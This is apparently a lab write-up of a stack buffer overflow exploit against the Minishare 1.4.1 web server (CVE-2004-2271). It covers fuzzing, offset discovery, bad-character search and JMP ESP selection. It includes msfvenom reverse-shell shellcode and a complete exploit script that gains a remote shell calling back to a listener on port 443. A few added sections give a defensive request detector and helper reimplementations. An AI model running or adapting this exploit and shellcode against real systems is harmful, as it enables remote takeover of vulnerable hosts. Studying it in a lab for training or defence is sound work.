Minishare 1.4.1 Buffer Overflow Exploitation

After rooting all the machines in the OSCP PWK labs, I started working on buffer overflow exploits against various vulnerable programs such as Minishare 1.4.1 and the Freefloat FTP server. These were simple vanilla stack overflows. This post covers the steps taken to exploit Minishare 1.4.1 through the buffer overflow in its handling of the HTTP GET request, as described in CVE-2004-2271.

Requirements for Exploitation:

  1. Windows XP SP3 64 bit.
  2. Immunity Debugger installed in above machine.
  3. Mona.py installed with Immunity Debugger.
  4. Download Vulnerable Minishare (Download Link).
  5. Kali Machine.

Steps involved in Exploitation:

  1. Fuzzing
  2. Finding Offset
  3. Search for Bad Characters
  4. JMP ESP Instruction
  5. Shellcode
  6. Exploitation

Fuzzing:

In this step we write a fuzzer for the buffer overflow in the handling of the HTTP GET request. The following Python script, minishare_fuzz.py, sends a growing buffer to Minishare until the server crashes.

#Minishare Fuzzing Program; Crashing the software to get buffer length

import socket

#Fuzzing in GET Parameter
pre_buff="GET "
buff =""
end_buff=" HTTP/1.1\r\n\r\n"

#Fuzzing loop
while True:
    buff = buff+"\x41"*100
    final_buff = pre_buff+buff+end_buff
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.connect(('192.168.116.131',80))
        print "Trying with buffer length %d" % len(buff)
        sock.send(final_buff)
        sock.recv(1024)
        sock.close()
    except:
        print "Server crashed with buffer length %d" % len(buff)
        exit()

$root@kali:~# python minishare_fuzz.py 
Trying with buffer length 100
Trying with buffer length 200
Trying with buffer length 300
...
Trying with buffer length 1600
Trying with buffer length 1700
Trying with buffer length 1800
Server crashed with buffer length 1800

We observe that the server crashed after a buffer of 1800 ‘\x41’ bytes (hex for ‘A’) was sent. The same step can be repeated with Immunity Debugger attached: start Minishare, attach the process in Immunity Debugger and leave it running. Since we already know the buffer size needed for the crash, we send a request with a 1800-byte path directly using ‘curl’ and analyse the crash in Immunity Debugger.

$root@kali:~# curl http://192.168.116.131/`python -c "print 'A'*1800"`

We can see an error, and EIP is overwritten with 41414141.
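From the defender's side, the request that triggers this crash is easy to recognise in traffic or in a web server's access log: an HTTP request line whose target is far longer than anything a browser sends, usually padded with one repeated byte and, in the weaponised form, carrying non-printable bytes. The following is an added Python 3 example, not code from the original post, that inspects raw request lines for those three traits. The threshold MAX_TARGET_LEN and the sample requests are constructed for this example; the third sample copies the buffer layout used later in this post, with \xcc bytes standing in for shellcode.

```python
import re

# Assumption for this example: a request target longer than this is treated as suspicious.
MAX_TARGET_LEN = 1024

# HTTP/1.x request line: METHOD SP request-target SP HTTP-version CRLF
REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/1\.[01]\r?\n")


def inspect_request(raw):
    """Return a list of findings for one raw HTTP request (bytes).
    An empty list means nothing suspicious was seen in the request line."""
    m = REQUEST_LINE.match(raw)
    if not m:
        return ["malformed request line"]
    target = m.group(2)
    findings = []
    if len(target) > MAX_TARGET_LEN:
        findings.append("oversized request target (%d bytes)" % len(target))
    # Bytes outside printable ASCII never belong in a legitimate request target.
    nonprint = sum(1 for b in target if b < 0x20 or b > 0x7e)
    if nonprint:
        findings.append("%d non-printable bytes in request target" % nonprint)
    # 32 or more copies of the same byte in a row: fuzzer filler or a NOP sled.
    if re.search(rb"(.)\1{31,}", target, re.DOTALL):
        findings.append("long run of repeated byte in request target")
    return findings


# Constructed sample requests (not captured traffic).
SAMPLE_NORMAL = b"GET /index.html HTTP/1.1\r\n\r\n"
SAMPLE_FUZZ = b"GET /" + b"A" * 1800 + b" HTTP/1.1\r\n\r\n"
SAMPLE_EXPLOIT_SHAPED = (b"GET /" + b"A" * 1787 + b"\x69\x2d\xb3\x7c"
                         + b"\x90" * 20 + b"\xcc" * 32 + b" HTTP/1.1\r\n\r\n")

if __name__ == "__main__":
    for name, sample in (("normal", SAMPLE_NORMAL), ("fuzz", SAMPLE_FUZZ),
                         ("exploit-shaped", SAMPLE_EXPLOIT_SHAPED)):
        print(name, "->", inspect_request(sample) or "clean")
```

The same three checks map directly onto an IDS rule or a log-parsing job: Minishare's own log truncates nothing, so the oversized target and the repeated byte are visible even after the process has crashed.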

Finding Offset

Here we find the exact position in the buffer that overwrites EIP. For this, the ‘pattern_create.rb’ Ruby script shipped with the Metasploit framework generates a unique, non-repeating pattern of length 1800.

$root@kali:~# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1800
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9

Back to Python scripting!! The unique pattern is sent using the script minishare_offset.py as follows:

import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.116.131',80))
pre_buff = "GET "
buff = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9"
end_buff=" HTTP/1.1\r\n\r\n"
final_buff = pre_buff+buff+end_buff
sock.send(final_buff)
sock.recv(1024)
sock.close()

Start Minishare, attach it in Immunity Debugger and run the script minishare_offset.py:

$root@kali:~# python minishare_offset.py 

EIP is overwritten with 36684335. To find the offset, ‘pattern_offset.rb’ from the Metasploit framework is used.

$root@kali:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 1800 -q 36684335
[*] Exact match at offset 1787

Confirming the offset with the following modified minishare_offset.py:

import socket
sock  = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.116.131',80))
pre_buff="GET "
buff = "A"*1787 +"B"*4 + "C"*400
end_buff=" HTTP/1.1\r\n\r\n"
final_buff = pre_buff+buff+end_buff
sock.send(final_buff)
sock.recv(1024)
sock.close()

Start Minishare, attach it to Immunity Debugger and execute the above script.

EIP is overwritten with 42424242 (the hex value of ‘B’) and ESP points to the start of the 400 C’s.
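The two Metasploit scripts are simple enough to reimplement, which makes the offset calculation above reproducible without Metasploit and shows why the lookup works. The following is an added Python 3 example, not code from the original post or from the Metasploit project. It assumes the standard pattern layout (upper-case letter, lower-case letter, digit, repeated in sequence) and a 32-bit little-endian x86 target, so the four bytes of the EIP value shown by the debugger must be reversed before searching for them in the pattern.

```python
import string


def pattern_create(length):
    """Build a cyclic pattern Aa0Aa1...Aa9Ab0...Zz9 and cut it to `length` bytes.
    Every 4-byte window of the pattern is unique within the first 20280 bytes,
    which is what makes the offset lookup unambiguous."""
    out = []
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out.append(u + l + d)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(pattern, eip_hex):
    """Given the EIP value exactly as the debugger displays it (e.g. '36684335'),
    return the offset of those bytes in the pattern, or None if not present.
    x86 is little-endian, so the value 0x36684335 sits in memory as 35 43 68 36."""
    value = int(eip_hex, 16)
    needle = value.to_bytes(4, "little")
    idx = pattern.encode("ascii").find(needle)
    return idx if idx >= 0 else None


if __name__ == "__main__":
    p = pattern_create(1800)
    print(p[:30] + "..." + p[-12:])
    # The EIP value observed on this page resolves to the offset it reports.
    print("offset of 36684335:", pattern_offset(p, "36684335"))
```

Running it prints an offset of 1787, matching pattern_offset.rb: the bytes 35 43 68 36 are the ASCII string "5Ch6", which begins at position 1787 of the pattern.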

Search for Bad Characters

This step identifies the bad characters: bytes that the target truncates or mangles and that therefore must not appear anywhere in the final exploit. The approach is to send every byte value from \x00 to \xff in order and look for the character at which the sequence seen in memory breaks.

bad = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

We append this list after the 4 B’s and observe the behaviour in Immunity Debugger. I modified the above minishare_offset.py into minishare_bad.py:

import socket
sock  = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.116.131',80))
pre_buff="GET "
buff = "A"*1787 +"B"*4 

bad = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
buff = buff+bad
end_buff=" HTTP/1.1\r\n\r\n"
final_buff = pre_buff+buff+end_buff
sock.send(final_buff)
sock.recv(1024)
sock.close()

Run it to crash the Minishare instance attached to Immunity Debugger.

Following ESP in the dump (at 01693908) shows that the sequence is truncated at ‘\x00’. Remove it from the ‘bad’ variable in minishare_bad.py and repeat the process.

Now the sequence breaks after 0A 0B 0C: 0D is truncated. Hence \x00 and \x0D are the bad characters. After removing \x0D and repeating the process, all the remaining characters appear intact.
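The send, dump and compare cycle above can be automated: compare the bytes that were sent with the bytes found at ESP, drop the first byte that is missing or altered, and repeat until everything arrives intact. The following is an added Python 3 example, not code from the original post. The simulated_dump function is a constructed stand-in for "follow ESP in the dump" that reproduces the two behaviours observed above (truncation at \x00, loss of \x0d); against a real target it would be replaced by sending the candidates and reading memory at ESP in the debugger.

```python
def first_bad_char(sent, observed):
    """Compare what was sent with what landed in memory; return the first byte
    that is missing or altered, or None if the whole sequence arrived intact."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None


def find_bad_chars(send_and_dump, candidates=bytes(range(256))):
    """Repeat the send / dump / compare cycle, removing each bad byte as it is
    found, until the remaining candidates arrive unchanged. Returns the bad
    bytes in the order they were discovered."""
    bad = []
    remaining = candidates
    while True:
        observed = send_and_dump(remaining)
        b = first_bad_char(remaining, observed)
        if b is None:
            return bad
        bad.append(b)
        remaining = bytes(x for x in remaining if x != b)


def simulated_dump(payload):
    """Constructed stand-in for the debugger dump (assumption, not the real target).
    It models the two effects described on this page: the request is handled as a
    C string, so everything from the first \\x00 onwards is lost, and \\x0d
    disappears from the sequence. A real harness would send `payload` to the
    target and return the bytes read at ESP."""
    payload = payload.split(b"\x00", 1)[0]
    return payload.replace(b"\x0d", b"")


if __name__ == "__main__":
    found = find_bad_chars(simulated_dump)
    print("bad characters:", ", ".join("\\x%02x" % b for b in found))
```

Because only the first break is trusted on each pass, a byte that merely shifts the rest of the sequence (as \x0d does here) is never mistaken for a run of bad bytes; the pass after its removal decides whether anything further is wrong.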

JMP ESP Instruction

In this step we find a memory address holding a JMP ESP instruction. Pointing EIP at it makes execution jump to whatever is at ESP, which is generally shellcode that opens a remote connection to the target system. I have used mona.py to inspect the loaded modules and their properties.

I am using SHELL32.dll in this case to find a JMP ESP instruction.

I took the very first one, ‘0x7cb32d69’, which will be used in the exploit to control EIP.

Shellcode 

Shellcode can be generated using ‘msfvenom’ to get a reverse shell.

$root@kali:~# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.116.136 LPORT=443 -b "\x00\x0d" -f python
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of python file: 1684 bytes
buf =  ""
buf += "\xb8\xb3\xd0\x2f\x15\xd9\xe1\xd9\x74\x24\xf4\x5f\x29"
buf += "\xc9\xb1\x52\x31\x47\x12\x03\x47\x12\x83\x5c\x2c\xcd"
buf += "\xe0\x5e\x25\x90\x0b\x9e\xb6\xf5\x82\x7b\x87\x35\xf0"
buf += "\x08\xb8\x85\x72\x5c\x35\x6d\xd6\x74\xce\x03\xff\x7b"
buf += "\x67\xa9\xd9\xb2\x78\x82\x1a\xd5\xfa\xd9\x4e\x35\xc2"
buf += "\x11\x83\x34\x03\x4f\x6e\x64\xdc\x1b\xdd\x98\x69\x51"
buf += "\xde\x13\x21\x77\x66\xc0\xf2\x76\x47\x57\x88\x20\x47"
buf += "\x56\x5d\x59\xce\x40\x82\x64\x98\xfb\x70\x12\x1b\x2d"
buf += "\x49\xdb\xb0\x10\x65\x2e\xc8\x55\x42\xd1\xbf\xaf\xb0"
buf += "\x6c\xb8\x74\xca\xaa\x4d\x6e\x6c\x38\xf5\x4a\x8c\xed"
buf += "\x60\x19\x82\x5a\xe6\x45\x87\x5d\x2b\xfe\xb3\xd6\xca"
buf += "\xd0\x35\xac\xe8\xf4\x1e\x76\x90\xad\xfa\xd9\xad\xad"
buf += "\xa4\x86\x0b\xa6\x49\xd2\x21\xe5\x05\x17\x08\x15\xd6"
buf += "\x3f\x1b\x66\xe4\xe0\xb7\xe0\x44\x68\x1e\xf7\xab\x43"
buf += "\xe6\x67\x52\x6c\x17\xae\x91\x38\x47\xd8\x30\x41\x0c"
buf += "\x18\xbc\x94\x83\x48\x12\x47\x64\x38\xd2\x37\x0c\x52"
buf += "\xdd\x68\x2c\x5d\x37\x01\xc7\xa4\xd0\xee\xb0\xd2\xa8"
buf += "\x87\xc2\x1a\xa8\xec\x4a\xfc\xc0\x02\x1b\x57\x7d\xba"
buf += "\x06\x23\x1c\x43\x9d\x4e\x1e\xcf\x12\xaf\xd1\x38\x5e"
buf += "\xa3\x86\xc8\x15\x99\x01\xd6\x83\xb5\xce\x45\x48\x45"
buf += "\x98\x75\xc7\x12\xcd\x48\x1e\xf6\xe3\xf3\x88\xe4\xf9"
buf += "\x62\xf2\xac\x25\x57\xfd\x2d\xab\xe3\xd9\x3d\x75\xeb"
buf += "\x65\x69\x29\xba\x33\xc7\x8f\x14\xf2\xb1\x59\xca\x5c"
buf += "\x55\x1f\x20\x5f\x23\x20\x6d\x29\xcb\x91\xd8\x6c\xf4"
buf += "\x1e\x8d\x78\x8d\x42\x2d\x86\x44\xc7\x5d\xcd\xc4\x6e"
buf += "\xf6\x88\x9d\x32\x9b\x2a\x48\x70\xa2\xa8\x78\x09\x51"
buf += "\xb0\x09\x0c\x1d\x76\xe2\x7c\x0e\x13\x04\xd2\x2f\x36"

Exploitation:

Using the JMP ESP address found above and the generated shellcode, the final exploit minishare_exploit is created as follows:

import socket
sock  = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.116.131',80))
pre_buff="GET "
buf =  ""
buf += "\xdb\xc9\xd9\x74\x24\xf4\xbd\xc3\xad\x95\x98\x5e\x29"
buf += "\xc9\xb1\x52\x31\x6e\x17\x83\xc6\x04\x03\xad\xbe\x77"
buf += "\x6d\xcd\x29\xf5\x8e\x2d\xaa\x9a\x07\xc8\x9b\x9a\x7c"
buf += "\x99\x8c\x2a\xf6\xcf\x20\xc0\x5a\xfb\xb3\xa4\x72\x0c"
buf += "\x73\x02\xa5\x23\x84\x3f\x95\x22\x06\x42\xca\x84\x37"
buf += "\x8d\x1f\xc5\x70\xf0\xd2\x97\x29\x7e\x40\x07\x5d\xca"
buf += "\x59\xac\x2d\xda\xd9\x51\xe5\xdd\xc8\xc4\x7d\x84\xca"
buf += "\xe7\x52\xbc\x42\xff\xb7\xf9\x1d\x74\x03\x75\x9c\x5c"
buf += "\x5d\x76\x33\xa1\x51\x85\x4d\xe6\x56\x76\x38\x1e\xa5"
buf += "\x0b\x3b\xe5\xd7\xd7\xce\xfd\x70\x93\x69\xd9\x81\x70"
buf += "\xef\xaa\x8e\x3d\x7b\xf4\x92\xc0\xa8\x8f\xaf\x49\x4f"
buf += "\x5f\x26\x09\x74\x7b\x62\xc9\x15\xda\xce\xbc\x2a\x3c"
buf += "\xb1\x61\x8f\x37\x5c\x75\xa2\x1a\x09\xba\x8f\xa4\xc9"
buf += "\xd4\x98\xd7\xfb\x7b\x33\x7f\xb0\xf4\x9d\x78\xb7\x2e"
buf += "\x59\x16\x46\xd1\x9a\x3f\x8d\x85\xca\x57\x24\xa6\x80"
buf += "\xa7\xc9\x73\x06\xf7\x65\x2c\xe7\xa7\xc5\x9c\x8f\xad"
buf += "\xc9\xc3\xb0\xce\x03\x6c\x5a\x35\xc4\x53\x33\x41\x9c"
buf += "\x3c\x46\xa9\x9d\x07\xcf\x4f\xf7\x67\x86\xd8\x60\x11"
buf += "\x83\x92\x11\xde\x19\xdf\x12\x54\xae\x20\xdc\x9d\xdb"
buf += "\x32\x89\x6d\x96\x68\x1c\x71\x0c\x04\xc2\xe0\xcb\xd4"
buf += "\x8d\x18\x44\x83\xda\xef\x9d\x41\xf7\x56\x34\x77\x0a"
buf += "\x0e\x7f\x33\xd1\xf3\x7e\xba\x94\x48\xa5\xac\x60\x50"
buf += "\xe1\x98\x3c\x07\xbf\x76\xfb\xf1\x71\x20\x55\xad\xdb"
buf += "\xa4\x20\x9d\xdb\xb2\x2c\xc8\xad\x5a\x9c\xa5\xeb\x65"
buf += "\x11\x22\xfc\x1e\x4f\xd2\x03\xf5\xcb\xe2\x49\x57\x7d"
buf += "\x6b\x14\x02\x3f\xf6\xa7\xf9\x7c\x0f\x24\x0b\xfd\xf4"
buf += "\x34\x7e\xf8\xb1\xf2\x93\x70\xa9\x96\x93\x27\xca\xb2"
end_buff=" HTTP/1.1\r\n\r\n"
#Return address 0x7cb32d69 is written byte-reversed because x86 is little-endian
buff = "A"*1787 + "\x69\x2d\xb3\x7c"+"\x90"*20+buf
final_buff = pre_buff+buff+end_buff
sock.send(final_buff)
sock.recv(1024)
sock.close()

The shellcode is prefixed with 20 NOPs (“\x90”). Start Minishare and attach it to the debugger. Set up a Netcat listener on port 443.

$root@kali:~# nc -nlvp 443

Run the Python script to get the reverse shell.

You can try to exploit again once without Immunity Debugger attached!!
